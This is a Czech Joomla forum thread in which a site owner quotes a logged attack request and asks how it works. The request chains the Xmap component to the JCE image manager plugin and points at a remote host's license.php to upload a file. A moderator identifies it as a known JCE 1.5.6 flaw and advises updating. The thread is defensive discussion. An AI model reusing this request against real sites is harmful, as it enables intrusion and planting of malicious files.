Přihlásit se

Joomla 5.2.2 Security & Bugfix Release

Joomla 5.2.2 je nyní k dispozici. Jedná se o bezpečnostní vydání pro Joomla 5.x.

pokus o hack webu

08. lis 2013 15:46 #112455
pokus o hack webu od radek
Zkušený uživatel
Ahoj,
obcas se podivam do admin tools kdo a jak se pokousi hacknout nebo jinak poskodit muj web. Dnes jsem zaznamenal z myho pohledu zajimavy pokus, kdy nekdo pres komponentu xmap se pokousel do toho nejak zapojit jce a pres to nahrat nejakyho smejda. Prvne to porad zkousel pres xmap a asi neuspel, tak to nejak zkombinoval s jce.

Je tady nekdo, kdo tomu rozumite a mohl byste mne vysvetlit o co a jak se tento hajzlik pokousel a jak se proti tomu nejlip branit?
Code:
/component/xmap/xml/1?view=xml&tmpl=component//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://www.istanbuldenizotobusu.com/license.php

a tady na teto adrese je pak opravdu formular, pres ktery pak asi nahrava smejdsky soubory lidem po webech. www.istanbuldenizotobusu.com/license.php

dik za vysvetleni

08. lis 2013 16:25 #112456
Odpověď od Cony
Moderátor
Podle mne to vypadá na pokus o zneužití díry v JCE 1.5.6, která je už notoricky známá. Zabráníte mu v tom jednoduše tak, že budete mít vše aktuální. Případně si jej v Admin Tools přidejte do blacklistu...

08. lis 2013 16:32 #112457
Odpověď od radek
Zkušený uživatel
No prvne se pokousel asi hodinu dostavat stejny utocnik jen na web pres XMAP. Pak asi zjistil, ze to nepujde. Z linku, co jsem sem dal je pak jasne videt, ze to zkousel nejak pres XMAP na JCE. To jsem prave nepochopil, jak se chce pres jednu komponentu dostat do druhe a zneuzit ji. Proc nezautocil rovnou na JCE?

Mam posledni verze JCE i XMAP a po tomto zjisteni jsem radsi XMAP vypl, i kdyz nevim, jestli to necemu zabrani nebo ne.

Zablokovat v Admin Tools co, jeho IP? To je zbytecny, to bych se ublokoval. Denne mam i 100 utoku a AT to po 3 utocich z jedne IP blokuje sam.

Powered by Fórum

Novinky z diskuze Nejnovější příspěvky